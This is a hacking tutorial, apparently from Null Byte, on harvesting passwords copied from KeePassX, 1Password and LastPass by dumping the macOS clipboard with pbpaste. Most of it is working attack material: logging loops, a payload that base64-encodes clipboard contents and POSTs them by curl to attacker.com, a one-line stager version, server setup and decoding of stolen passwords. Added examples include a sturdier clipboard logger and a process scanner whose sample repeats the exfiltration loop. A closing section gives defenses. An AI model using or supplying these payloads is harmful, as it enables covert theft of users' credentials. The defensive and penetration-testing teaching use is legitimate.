
Saving 1Password, KeePassX, and LastPass Passwords in Plain Text «Null Byte :: WonderHowTo



KeePassX, 1Password, and LastPass are effective against keyloggers, phishing, and database breaches. However, password managers rely on the operating system's clipboard to move credentials from the password store to the web browser. Within a few seconds, an attacker can dump the contents of the clipboard and pick the passwords out of it.

There are two scenarios for an attack on the clipboard targeting password managers. Both use the pbpaste command, which ships with every version of macOS. Pbpaste takes whatever is on the clipboard (passwords included) and writes it to standard output. Any macOS user can try this by copying a password to the clipboard and then typing pbpaste into a terminal.

No special permissions are required to run pbpaste, and its output can be redirected to any file, as shown below.

  ~$ pbpaste >> /tmp/clipboard.txt

Option 1: Back Up the Clipboard Locally

Scenario: The attacker has a persistent backdoor in place and wants to collect the passwords that pass through the clipboard from KeePassX, 1Password, or LastPass over a longer period of time. Keylogging has become harder on recent macOS versions, and watching the desktop live wouldn't help either, since the password managers mask the stored credentials on screen.

The attacker can dump the clipboard to a local file and search it for new passwords from time to time. An infinite while loop with a five-second delay is enough.

  ~$ while true; do echo -e "\n$(pbpaste)" >> /tmp/clipboard.txt && sleep 5; done

The while loop runs pbpaste and then pauses (sleep) for five seconds. The command in the loop repeats indefinitely, appending whatever is on the clipboard each time. The echo with -e inserts a newline (\n) before each entry so consecutive captures don't run together on the same line.

Use tail in a second Netcat shell to watch the contents of the clipboard.txt file.

  ~$ tail -f /tmp/clipboard.txt

Tail's -f (follow) option watches the file for changes and immediately prints whatever new content was found on the clipboard.

To keep clipboard.txt from filling up with duplicate lines, evaluate the current clipboard contents and compare them with the last entry in the file.

  ~$ while true; do if [[ "$(pbpaste)" != "$(tail -n1 /tmp/clipboard.txt)" ]]; then echo -e "\n$(pbpaste)" >> /tmp/clipboard.txt; fi; sleep 5; done

Only when the current clipboard contents differ (!=) from the last entry (tail -n1) in clipboard.txt is pbpaste's output appended to the file.

This solution is somewhat flawed. The if statement compares only the last line of clipboard.txt, so if the clipboard holds several lines, it will not be recognized as a duplicate entry. It serves its purpose for this article and most scenarios, though; a little extra effort would produce a properly robust version.
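As an added example that is not part of the original article, here is one way to close that gap: every capture is stored as a single base64-encoded line with a timestamp, so a multi-line clipboard still compares correctly against the previous record, and an empty clipboard is never logged. It assumes bash or sh with the standard base64, awk, and date utilities; the watch_clipboard function is the macOS entry point and needs pbpaste, while record_clipboard and decode_last run anywhere.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): a clipboard logger that
# writes one "<UTC timestamp> <base64>" record per capture, so multi-line
# clipboard contents are compared as a whole, not by their last line.
# Assumes bash 3.2+ (the macOS default) or POSIX sh plus base64/awk/date.

# Encode a string as a single base64 line. GNU base64 wraps at 76 columns,
# macOS base64 does not; tr strips any wrapping newlines in both cases.
encode_b64() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

# Append a record to the log unless the content is empty or identical to
# the previous record. Returns 0 when a record was written, 1 otherwise.
record_clipboard() {
    local logfile="$1" content="$2" enc last
    [ -n "$content" ] || return 1
    enc=$(encode_b64 "$content")
    last=""
    # Compare the encoded forms: each record is exactly one line, so the
    # last line of the file always holds the complete previous capture.
    [ -s "$logfile" ] && last=$(tail -n1 "$logfile" | awk '{print $2}')
    [ "$enc" != "$last" ] || return 1
    printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$enc" >> "$logfile"
}

# Decode the most recent record back to plain text.
decode_last() {
    tail -n1 "$1" | awk '{print $2}' | base64 -d   # older macOS: base64 -D
}

# Poll the clipboard every N seconds (default 5). macOS only: needs pbpaste.
watch_clipboard() {
    local logfile="$1" interval="${2:-5}"
    while true; do
        record_clipboard "$logfile" "$(pbpaste)" || true
        sleep "$interval"
    done
}

# Usage on a Mac: watch_clipboard /tmp/clipboard.txt 5
# Read it back:   decode_last /tmp/clipboard.txt
```

Because every record is a single line, tail -n1 always sees the whole previous capture, which is exactly what the last-line comparison above gets wrong for multi-line pastes.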

Option 2: Transferring Passwords to a Remote Server

Scenario: The attacker doesn't want to keep remote access to the MacBook. Instead, a payload periodically sends the clipboard contents to the attacker's server.

In this scenario, the attacker only cares about exfiltrating the clipboard and hasn't backdoored the MacBook; they've simply found a way to execute code on the target macOS device. The setup uses a PHP server controlled by the attacker to receive the exfiltrated data. My example uses a Debian virtual private server.

Step 1: Install PHP

To begin, install PHP with the following apt-get command on Debian or Kali Linux.

  ~# apt-get update && apt-get install php

Ign:1 http://http.us.debian.org/debian stretch InRelease
Hit:2 http://http.us.debian.org/debian stretch-updates InRelease
Hit:3 http://security.debian.org/debian-security stretch/updates InRelease
Hit:4 http://http.us.debian.org/debian stretch Release
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  apache2-bin libapache2-mod-php7.0 libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0 php
  php7.0 php7.0-cli php7.0-common php7.0-json php7.0-opcache php7.0-readline psmisc
0 upgraded, 16 newly installed, 0 to remove and 0 not upgraded.
Need to get 5,209 kB of archives.
After this operation, 19.9 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Create a directory named "phpServer/" with the mkdir command.

  ~# mkdir phpServer/

Change into the phpServer/ directory with cd.

  ~# cd phpServer/

Create a file named "index.php" with nano.

  ~/phpServer# nano index.php

Paste the following PHP code into nano. When you're done, press Ctrl + x, then y, then Enter to save and exit.

   

This simple PHP server receives the data and needs no modification to work. When the MacBook sends the clipboard contents, the server captures the data and appends it to a file named clipboard.txt.

Finally, start the PHP server with the php -S 0.0.0.0:80 command.

  ~/phpServer# php -S 0.0.0.0:80

PHP 7.0.33-0+deb9u3 Development Server started at Sun Jun  9 08:38:55 2019
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.

Step 2: Create the Payload

The following script compares the current contents of the clipboard with what was last sent to the attacker's server. For clarity it's written out in normal shell-script layout, which leaves room for comments.

while true; do

  # The if statement compares the current clipboard
  # contents to the contents seen in the previous loop.
  if [[ "$(pbpaste)" != "$pbpaste_last" ]]; then

    # `p` holds the base64-encoded clipboard contents. The
    # contents are encoded before they're sent to the attacker's
    # server so that special characters in a password can't
    # break the request or be interpreted as a command.
    p="$(echo "$(pbpaste)" | base64)"

    # curl takes the encoded string and delivers it to the
    # attacker's server in a POST request.
    curl --data "$p" -X POST 'http://attacker.com/'

    # The `pbpaste_last` variable is updated. It's the value
    # compared against in the next loop.
    pbpaste_last="$(pbpaste)"
  fi

  # Wait five seconds before checking the clipboard for new
  # content again. Lowering this value makes the script poll
  # the clipboard more often, which costs more of the MacBook's
  # CPU time. Raising it risks missing a valuable password.
  # Adjust as needed.
  sleep 5
done

Compressed into a single line, the script fits easily into various stager types.

  ~$ while true; do if [[ "$(pbpaste)" != "$pbpaste_last" ]]; then p="$(echo "$(pbpaste)" | base64)"; curl --data "$p" -X POST 'http://attacker.com/' && pbpaste_last="$(pbpaste)"; fi; sleep 5; done

Step 3: Examining the Exfiltrated Data

When the PHP server receives clipboard data, it logs the source IP address along with the date and time. Press Ctrl + c to stop the PHP server.

  PHP 7.0.33-0+deb9u3 Development Server started at Sun Jun  9 08:38:55 2019
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.
[Sun Jun  9 09:03:23 2019] 23.129.64.153:63761 [200]: /
[Sun Jun  9 09:03:33 2019] 23.129.64.153:46089 [200]: /
[Sun Jun  9 09:03:50 2019] 23.129.64.184:13728 [200]: /
[Sun Jun  9 09:03:56 2019] 199.195.250.77:38894 [200]: /
[Sun Jun  9 09:04:02 2019] 199.195.250.77:40646 [200]: /
[Sun Jun  9 09:04:10 2019] 209.141.58.114:45602 [200]: /

View the contents of clipboard.txt with cat to find the base64-encoded passwords. KeePassX and 1Password automatically clear the clipboard after 10 and 30 seconds respectively; LastPass says the clipboard is cleared "after a given period of time". An empty clipboard sent by the MacBook shows up as "Cg==", the base64 encoding of a single newline.

  ~/phpServer# cat clipboard.txt

WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg==
Cg==
dGhpcyBpcyBteSBwYXNzd29yZAo=
UHdVN1YzWzg3a3ZUPyNed01QKF9jVHltNj8iPjoifTp7Kl5gYH4K
WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg==
Cg==
WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg==

The following command decodes every base64 string in clipboard.txt. The resulting strings are the passwords collected from KeePassX, 1Password, and LastPass; the blank lines are the empty-clipboard entries.

  ~/phpServer# cat clipboard.txt | while read -r password; do base64 -d <<< "$password"; done

YT4n3M4sCpjpsTV7LkZoK

this is my password
PwU7V3[87kvT?#^wMP(_cTym6?">:"}:{*^``~
YT4n3M4sCpjpsTV7LkZoK

YT4n3M4sCpjpsTV7LkZoK

Living Off the Land (Conclusion)

Penetration testers are encouraged to make the most of whatever is already available on the compromised operating system (i.e., "living off the land"). Like cURL, Netcat, Bash, and LibreSSL, pbpaste is another built-in tool that hackers can easily abuse after exploitation.

An attacker will look for every possible way to get at a target's login passwords. With pbpaste, harvesting the credentials stored in password managers is almost too easy.

How to Protect Yourself from Clipboard Dumping

To keep an attacker from dumping your clipboard, install the official 1Password browser extension or the LastPass browser extension; both are available for all modern web browsers. KeePassX users have similar browser extensions to choose from, but none of them are official or have been vetted.

For 1Password, enable the 1Password Extension Helper when prompted after installing the extension. The helper lets 1Password fill in login credentials automatically when you sign in to websites. Auto-fill doesn't touch the clipboard at all, so there is nothing for pbpaste to grab. The process is similar for the LastPass extension.

Note that neither works 100% of the time. Occasionally a site's auto-fill fails and you'll still need to copy a password to the clipboard.

If you do need to copy a password, you can adjust the password manager's clipboard settings. In 1Password, for example, open the preferences, select "Security," and enter a time in seconds under "Clear Clipboard After." Make it as short as you can live with: the hacks above poll every five seconds, so three or four seconds would help. That still doesn't stop an attacker who checks the clipboard at just the right moment or shortens the polling interval.

More generally, macOS has no built-in way to clear the clipboard after a set time or after a paste, and such a setting wouldn't be desirable anyway, because the clipboard is used for far more than passwords.

You can create a clipboard-clearing service and assign it a shortcut such as Command + Down Arrow, then clear the clipboard manually right after pasting a password so it lingers no longer than necessary. Just create the service in Automator using the following "Run Shell Script" action. It has the same limitation as above, though: the clipboard can still be dumped at the right moment, or by a loop that polls more often than you clear it.

  pbcopy </dev/null
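The advice above is all about shortening the window; a defender can also look for the polling loop itself. As an added, defender-side example that is not part of the original article, the following script scans ps output for command lines that invoke pbpaste inside a loop, with a sleep, or alongside curl, which are the ingredients of both payloads in this article. It assumes a bash or sh with awk and ps; the ps listing embedded in it is constructed for offline testing, and scan_live is the function to run on a real Mac. Because ps shows a process's arguments, it catches one-liners launched via bash -c or sh -c by a stager, but a loop typed into an already-running interactive shell appears only as that shell and is not visible this way. Occasional pbpaste use in ordinary scripts is legitimate, so treat hits as leads to investigate, not proof.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): a defender-side check that
# flags processes whose command line polls pbpaste in a loop. Assumes bash
# or POSIX sh, awk, and ps with -o pid,ppid,user,command (macOS and Linux).

# Read ps output (including its header line) on stdin and print
# "PID<TAB>COMMAND" for every process whose command line contains pbpaste
# together with a loop keyword, a sleep, or a curl call.
find_clipboard_loops() {
    awk 'NR > 1 && /pbpaste/ && (/while/ || /sleep/ || /curl/) {
             pid = $1
             # Drop the pid, ppid and user columns; keep the command line.
             $1 = ""; $2 = ""; $3 = ""
             sub(/^ +/, "")
             print pid "\t" $0
         }'
}

# Constructed sample ps output (not captured from a real system) used to
# exercise the filter offline. Two of the five entries are polling loops.
SAMPLE_PS='  PID  PPID USER     COMMAND
  412     1 alice    /Applications/1Password 7.app/Contents/MacOS/1Password 7
 5123  5100 alice    bash -c while true; do echo -e "\n$(pbpaste)" >> /tmp/clipboard.txt && sleep 5; done
 5207  5100 alice    /bin/sh -c while true; do p=$(pbpaste | base64); curl --data "$p" http://attacker.com/; sleep 5; done
 5301  5290 alice    pbpaste
 5400  5390 alice    /usr/bin/ssh -N bastion'

# Number of suspicious entries in the constructed sample.
count_sample_hits() {
    printf '%s\n' "$SAMPLE_PS" | find_clipboard_loops | wc -l | tr -d ' '
}

# Live scan on a Mac: list every process and run it through the filter.
scan_live() {
    ps -axo pid,ppid,user,command | find_clipboard_loops
}

# Usage: scan_live
# Offline check against the sample: printf '%s\n' "$SAMPLE_PS" | find_clipboard_loops
```

The lone pbpaste process (PID 5301 in the sample) is deliberately not flagged: a single invocation is what a user or a legitimate script does, whereas the loop and the outbound curl are what distinguish the harvesting payloads described above.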

If you liked this article, follow me on Twitter @tokyoneon_ . If you have questions or concerns, leave a comment or message on Twitter.


Cover photo and screenshots of tokyoneon / Null Byte



